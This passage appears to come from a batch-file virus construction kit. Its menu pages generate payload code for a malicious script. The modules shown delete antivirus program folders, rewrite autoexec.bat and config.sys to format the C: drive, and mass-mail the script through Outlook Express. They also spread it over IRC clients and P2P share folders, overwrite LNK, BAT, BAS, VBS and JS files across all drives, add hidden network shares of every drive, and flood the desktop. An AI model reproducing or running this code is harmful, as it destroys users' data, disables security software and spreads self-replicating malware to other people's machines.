%Gpo% %&%"avp\>nul">>%egOxbF%
%Gpo% %&%"avx\>nul">>%egOxbF%
%Gpo% %&%"avx2000\>nul">>%egOxbF%
%Gpo% %&%"avpers~1\>nul">>%egOxbF%
%Gpo% %&%"bitdef~1\>nul">>%egOxbF%
%Gpo% %&%"bitdef~2\>nul">>%egOxbF%
%Gpo% %&%"comman~1\>nul">>%egOxbF%
%Gpo% %&%"common~1\avpsha~1\>nul">>%egOxbF%
%Gpo% %&%"common~1\symant~1\>nul">>%egOxbF%
%Gpo% %&%"datafe~1\>nul">>%egOxbF%
%Gpo% %&%"deerfi~1.com\>nul">>%egOxbF%
%Gpo% %&%"f-prot\>nul">>%egOxbF%
%Gpo% %&%"f-prot95\>nul">>%egOxbF%
%Gpo% %&%"findvi~1\>nul">>%egOxbF%
%Gpo% %&%"f-secu~1\>nul">>%egOxbF%
%Gpo% %&%"f-secure\>nul">>%egOxbF%
%Gpo% %&%"fsi\>nul">>%egOxbF%
%Gpo% %&%"fwin\>nul">>%egOxbF%
%Gpo% %&%"fwin32\>nul">>%egOxbF%
%Gpo% %&%"grisoft\>nul">>%egOxbF%
%Gpo% %&%"inocul~1\>nul">>%egOxbF%
%Gpo% %&%"inocul~2\>nul">>%egOxbF%
%Gpo% %&%"intern~2\>nul">>%egOxbF%
%Gpo% %&%"kasper~1\>nul">>%egOxbF%
%Gpo% %&%"kasper~2\>nul">>%egOxbF%
%Gpo% %&%"mcafee\>nul">>%egOxbF%
%Gpo% %&%"mcafee~1\>nul">>%egOxbF%
%Gpo% %&%"mindso~1\>nul">>%egOxbF%
%Gpo% %&%"norman\>nul">>%egOxbF%
%Gpo% %&%"norton~1\>nul">>%egOxbF%
%Gpo% %&%"norton~2\>nul">>%egOxbF%
%Gpo% %&%"pandas~1\>nul">>%egOxbF%
%Gpo% %&%"protec~1\>nul">>%egOxbF%
%Gpo% %&%"protec~2\>nul">>%egOxbF%
%Gpo% %&%"quickh~1\>nul">>%egOxbF%
%Gpo% %&%"rav\>nul">>%egOxbF%
%Gpo% %&%"signal9\>nul">>%egOxbF%
%Gpo% %&%"softwin\>nul">>%egOxbF%
%Gpo% %&%"spysto~1\>nul">>%egOxbF%
%Gpo% %&%"symant~1\>nul">>%egOxbF%
%Gpo% %&%"tbav\>nul">>%egOxbF%
%Gpo% %&%"tinype~1\>nul">>%egOxbF%
%Gpo% %&%"trendm~1\>nul">>%egOxbF%
%Gpo% %&%"trendp~1\>nul">>%egOxbF%
%Gpo% %&%"trojan~1\>nul">>%egOxbF%
%Gpo% %&%"trojan~2\>nul">>%egOxbF%
%Gpo% %&%"virusm~1.0\>nul">>%egOxbF%
%Gpo% %&%"zonela~1\>nul">>%egOxbF%
%Gpo% %&%"zonela~2\>nul">>%egOxbF%
set &=
%lOpJy%

:004
cls
echo.
echo.
echo.
echo        Autoexec.bat & Config.sys payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Payloads for autoexec.bat & config.sys
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 005
if %BEKo% 1 goto a11
goto done

:a11
cls
%jHsCEP%
%Gpo% "echo.time 00:00:00,00>>c:\autoexec.bat">>%egOxbF%
%Gpo% "echo.date 80-01-01>>c:\autoexec.bat">>%egOxbF%
%Gpo% "echo.%%comspec%% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat">>%egOxbF%
%Gpo% "echo.%%comspec%% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat">>%egOxbF%
%Gpo% "echo.%%comspec%% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat">>%egOxbF%
%Gpo% "echo.[menu]>c:\config.sys">>%egOxbF%
%Gpo% "echo.menuitem="&g&">>c:\config.sys">>%egOxbF%
%Gpo% "echo.>>c:\config.sys">>%egOxbF%
%Gpo% "echo.["&g&"]>>c:\config.sys">>%egOxbF%
%Gpo% "echo.buffers=1>>c:\config.sys">>%egOxbF%
%Gpo% "echo.files=1>>c:\config.sys">>%egOxbF%
%Gpo% "echo.lastdrive=A>>c:\config.sys">>%egOxbF%
%Gpo% "echo.set path="&chr(37)&e&chr(37)&">>c:\config.sys">>%egOxbF%
%Gpo% "echo.set temp=A:\>>c:\config.sys">>%egOxbF%
%Gpo% "echo.set windir=format c:/u/q/autotest>>c:\config.sys">>%egOxbF%
%lOpJy%

:005
cls
echo.
echo.
echo.
echo        Outlook Express e-mail worm
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Outlook Express spreading
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 006
if %BEKo% 1 goto a12
goto done

:a12
cls
%jHsCEP%
set +=&Chr(37)&t&Chr(37)&
echo.t="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.t=t&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&t&"=adress">>%egOxbF%
echo.u="">>%egOxbF%
echo.f=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To f>>%egOxbF%
echo.u=u&chr(int(rnd(1)*26)+97)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&u&"=attachments.add">>%egOxbF%
%Gpo% "copy %%0 c:\"&c&".bat>nul">>%egOxbF%
%Gpo% "echo.set abc=createobject("&Chr(34)&"outlook.application"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set bac=abc.getnamespace("&Chr(34)&"MAPI"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set cab=bac."%+%"lists>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.for each d in cab>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.for e=1 to d."%+%"entries.count>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.dim f>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set f=abc.createitem(0)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.to=d."%+%"entries(e)."%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.subject="&chr(34)&chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.body="&chr(34)&chr(34)&"&d."%+%"entries(e).name&"&chr(34)&chr(34)&"&vbcrlf>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.body=f.body&"&chr(34)&chr(34)&"&vbcrlf>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.body=f.body&"&chr(34)&chr(34)&"&vbcrlf&"&chr(34)&chr(34)&"&f>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f."&Chr(37)&u&Chr(37)&" "&Chr(34)&"c:\"&c&".bat"&Chr(34)&",1,len(f.body),"&Chr(34)&c&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.importance=2>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.send>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
set +=
%lOpJy%

:006
cls
echo.
echo.
echo.
echo        IRC worm (pirch, mirc, virc)
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via IRC
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 007
if %BEKo% 1 goto a13
goto done

:a13
cls
%jHsCEP%
%Gpo% "echo.[script]>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.n0=on 1:JOIN:#:{>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.n1=/if ( $nick == $me ) { halt }>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.n2=/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.n3=}>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&"mirc\script.ini>nul">>"%egOxbF%
%Gpo% chr(37)&e&chr(37)&"mirc32\script.ini>nul">>"%egOxbF%
%Gpo% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc\script.ini>nul">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc32\script.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\mirc\script.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\mirc32\script.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc\script.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc32\script.ini>nul">>%egOxbF%
%Gpo% "echo.[Levels]>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Enabled=1>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Count=1>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Level1="&c&">>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo."&c&"Enabled=1>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.["&c&"]>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.User1=*!*@*>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.UserCount=1>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Event1=ON PART:#:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /msg $nick WinUpdate>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Event2=ON JOIN:#:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /notice $nick Potential>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Event3=ON TEXT:*fuck*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Event4=ON TEXT:*sex*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.Event5=ON TEXT:*girl*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% "echo.EventCount=5>>%%windir%%\system\"&c&"\"&c&".ini">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&"pirch\events.ini>nul">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&"pirch98\events.ini>nul">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&"pirch32\events.ini>nul">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch\events.ini>nul">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch98\events.ini>nul">>%egOxbF%
%Gpo% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch32\events.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch\events.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch98\events.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch32\events.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch\events.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch98\events.ini>nul">>%egOxbF%
%Gpo% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch32\events.ini>nul">>%egOxbF%
%Gpo% "echo.set z=CreateObject("&Chr(34)&"wscript.shell"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.z.regwrite "&Chr(34)&"HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"&Chr(34)&","&Chr(34)&"dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%lOpJy%

:007
cls
echo.
echo.
echo.
echo        P2P worm
echo        ÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via p2p
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 008
if %BEKo% 1 goto a14
goto done

:a14
cls
%jHsCEP%
set -=&chr(37)&g&chr(37)&
%Gpo% "copy %%0 c:\download\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\kazaa\myshar~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\mydown~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\mydocu~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"applej~1\incoming\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"bearsh~1\shared\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"edonke~1\incoming\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"emule\incoming\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"grokster\mygrok~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"icq\shared~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"kazaa\myshar~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"kazaal~1\myshar~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"kmd\myshar~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"limewire\shared\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"morpheus\myshar~1\"&c&".bat>nul">>%egOxbF%
%Gpo% "copy %%0 c:\"%-%"overnet\bundles\"&c&".bat>nul">>%egOxbF%
set -=
%lOpJy%

:008
cls
echo.
echo.
echo.
echo        LNK droping
echo        ÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via lnk files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 009
if %BEKo% 1 goto a15
goto done

:a15
cls
%jHsCEP%
%Gpo% "echo.set a=Wscript.CreateObject("&Chr(34)&"WScript.Shell"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.set b=a.CreateShortcut("&Chr(34)&"%windir%\system\"&c&"\"&c&".lnk"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.b.TargetPath=a.ExpandEnvironmentStrings("&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.b.WindowStyle=4>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.b.Save>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "for %%%%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %%windir%%\*.lnk %%path%%\*.lnk %%windir%%\desktop\*.lnk %%windir%%\system\*.lnk) do attrib -r -h -s -a %%%%b">>%egOxbF%
%Gpo% "for %%%%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %%windir%%\*.lnk %%path%%\*.lnk %%windir%%\desktop\*.lnk %%windir%%\system\*.lnk) do copy %%windir%%\system\"&c&"\"&c&".lnk %%%%b /y">>%egOxbF%
%Gpo% "for %%%%b in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%b:\nul copy %%windir%%\"&c&"\"&c&".lnk %%%%b:\funny.lnk /y">>%egOxbF%
%lOpJy%

:009
cls
echo.
echo.
echo.
echo        BAT infection
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via bat files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 010
if %BEKo% 1 goto a16
goto done

:a16
cls
%jHsCEP%
%Gpo% "for %%%%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do attrib -r -h -s -a %%%%c">>%egOxbF%
%Gpo% "for %%%%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do copy %%windir%%\system\"&c&"\tmpdelis.bat %%%%c /y">>%egOxbF%
%Gpo% "for %%%%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%c:\nul copy %%windir%%\system\"&c&"\tmpdelis.bat %%%%c:\_tmpcfg.bat /y">>%egOxbF%
%lOpJy%

:010
cls
echo.
echo.
echo.
echo        BAS (Quick Basic) droping
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via bas files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 011
if %BEKo% 1 goto a17
goto done

:a17
cls
%jHsCEP%
%Gpo% "echo.SHELL "&Chr(34)&"%%windir%%\system\"&c&"\tmpdelis.bat"&Chr(34)&">%%windir%%\system\"&c&"\"&c&".bas">>%egOxbF%
%Gpo% "echo.END>>%%windir%%\system\"&c&"\"&c&".bas">>%egOxbF%
%Gpo% "for %%%%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do attrib -r -h -s -a %%%%d">>%egOxbF%
%Gpo% "for %%%%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do copy %%windir%%\system\"&c&"\"&c&".bas %%%%d /y">>%egOxbF%
%Gpo% "for %%%%d in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%d:\nul copy %%windir%%\system\"&c&"\"&c&".bas %%%%d:\tmp_.bas /y">>%egOxbF%
%lOpJy%

:011
cls
echo.
echo.
echo.
echo        VBS & JS droping
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Spread via vbs & js files
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 012
if %BEKo% 1 goto a18
goto done

:a18
cls
%jHsCEP%
%Gpo% "echo.set a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.a.run "&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&", VBHide>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "for %%%%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do attrib -r -h -s -a %%%%e">>%egOxbF%
%Gpo% "for %%%%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do copy %%windir%%\system\"&c&"\"&c&".vbs %%%%e /y">>%egOxbF%
%Gpo% "for %%%%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%e:\nul copy %%windir%%\system\"&c&"\"&c&".vbs %%%%e:\tmp_.vbs /y">>%egOxbF%
%Gpo% "echo.a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&");>%%windir%%\system\"&c&"\"&c&".js">>%egOxbF%
%Gpo% "echo.a.Run("&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&");>>%%windir%%\system\"&c&"\"&c&".js">>%egOxbF%
%Gpo% "for %%%%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do attrib -r -h -s -a %%%%f">>%egOxbF%
%Gpo% "for %%%%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do copy %%windir%%\system\"&c&"\"&c&".js %%%%f /y">>%egOxbF%
%Gpo% "for %%%%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%f:\nul copy %%windir%%\system\"&c&"\"&c&".js %%%%f:\tmp_.js /y">>%egOxbF%
%lOpJy%

:012
cls
echo.
echo.
echo.
echo        Hidden Sharing
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Enable hidden sharing on all drives
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 013
if %BEKo% 1 goto a19
goto done

:a19
cls
%jHsCEP%
%Gpo% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\"&Chr(37)&Chr(37)&"1$]>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"Flags"&Chr(34)&"=dword:00000302>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"Parm1enc"&Chr(34)&"=hex:>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"Parm2enc"&Chr(34)&"=hex:>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"Path"&Chr(34)&"="&Chr(34)&Chr(37)&Chr(37)&"1:\\"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"Remark"&Chr(34)&"="&Chr(34)&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "echo."&Chr(34)&"Type"&Chr(34)&"=dword:00000000>>%%windir%%\system\"&c&"\"&c&".reg">>%egOxbF%
%Gpo% "for %%%%g in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;t;s;t;u;v;w;x;y;z;a) do start regedit /s %%windir%%\system\"&c&"\"&c&".reg %%%%g>nul">>%egOxbF%
%lOpJy%

:013
cls
echo.
echo.
echo.
echo        Desktop payload
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Fill desktop with undeleatable folders
echo.
echo    2 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto 014
if %BEKo% 1 goto a20
goto done

:a20
cls
%jHsCEP%
set +=&Chr(124)&
set &=&Chr(62)&
set -=Chr(37)&i&Chr(37)&i&
echo.i="">>%egOxbF%
echo.j=int(rnd(1)*8)+1>>%egOxbF%
echo.for w=1 To j>>%egOxbF%
echo.i=i&chr(int(rnd(1)*120)+120)>>%egOxbF%
echo.next>>%egOxbF%
%Gpo% "set "&i&"=md %%windir%%\desktop\">>%egOxbF%
%Gpo% %-%"00"%&%"nul "%+%" "&%-%"01"%&%"nul "%+%" "&%-%"02"%&%"nul "%+%" "&%-%"03"%&%"nul">>%egOxbF%
%Gpo% %-%"04"%&%"nul "%+%" "&%-%"05"%&%"nul "%+%" "&%-%"06"%&%"nul "%+%" "&%-%"07"%&%"nul">>%egOxbF%
%Gpo% %-%"08"%&%"nul "%+%" "&%-%"09"%&%"nul "%+%" "&%-%"10"%&%"nul "%+%" "&%-%"11"%&%"nul">>%egOxbF%
%Gpo% %-%"12"%&%"nul "%+%" "&%-%"13"%&%"nul "%+%" "&%-%"14"%&%"nul "%+%" "&%-%"15"%&%"nul">>%egOxbF%
%Gpo% %-%"16"%&%"nul "%+%" "&%-%"17"%&%"nul "%+%" "&%-%"18"%&%"nul "%+%" "&%-%"19"%&%"nul">>%egOxbF%
%Gpo% %-%"20"%&%"nul "%+%" "&%-%"21"%&%"nul "%+%" "&%-%"22"%&%"nul "%+%" "&%-%"23"%&%"nul">>%egOxbF%
%Gpo% %-%"24"%&%"nul "%+%" "&%-%"25"%&%"nul "%+%" "&%-%"26"%&%"nul "%+%" "&%-%"27"%&%"nul">>%egOxbF%
%Gpo% %-%"28"%&%"nul "%+%" "&%-%"29"%&%"nul "%+%" "&%-%"30"%&%"nul "%+%" "&%-%"31"%&%"nul">>%egOxbF%
%Gpo% %-%"32"%&%"nul "%+%" "&%-%"33"%&%"nul "%+%" "&%-%"34"%&%"nul "%+%" "&%-%"35"%&%"nul">>%egOxbF%
%Gpo% %-%"36"%&%"nul "%+%" "&%-%"37"%&%"nul "%+%" "&%-%"38"%&%"nul "%+%" "&%-%"39"%&%"nul">>%egOxbF%
%Gpo% %-%"40"%&%"nul "%+%" "&%-%"41"%&%"nul "%+%" "&%-%"42"%&%"nul "%+%" "&%-%"43"%&%"nul">>%egOxbF%
%Gpo% %-%"44"%&%"nul "%+%" "&%-%"45"%&%"nul "%+%" "&%-%"46"%&%"nul "%+%" "&%-%"47"%&%"nul">>%egOxbF%
%Gpo% %-%"48"%&%"nul "%+%" "&%-%"49"%&%"nul "%+%" "&%-%"50"%&%"nul "%+%" "&%-%"51"%&%"nul">>%egOxbF%
%Gpo% %-%"52"%&%"nul "%+%" "&%-%"53"%&%"nul "%+%" "&%-%"54"%&%"nul "%+%" "&%-%"55"%&%"nul">>%egOxbF%
%Gpo% %-%"56"%&%"nul "%+%" "&%-%"57"%&%"nul "%+%" "&%-%"58"%&%"nul "%+%" "&%-%"59"%&%"nul">>%egOxbF%
%Gpo% %-%"60"%&%"nul "%+%" "&%-%"61"%&%"nul "%+%" "&%-%"62"%&%"nul "%+%" "&%-%"63"%&%"nul">>%egOxbF%
%Gpo% %-%"64"%&%"nul "%+%" "&%-%"65"%&%"nul "%+%" "&%-%"66"%&%"nul "%+%" "&%-%"67"%&%"nul">>%egOxbF%
%Gpo% %-%"68"%&%"nul "%+%" "&%-%"69"%&%"nul "%+%" "&%-%"70"%&%"nul "%+%" "&%-%"71"%&%"nul">>%egOxbF%
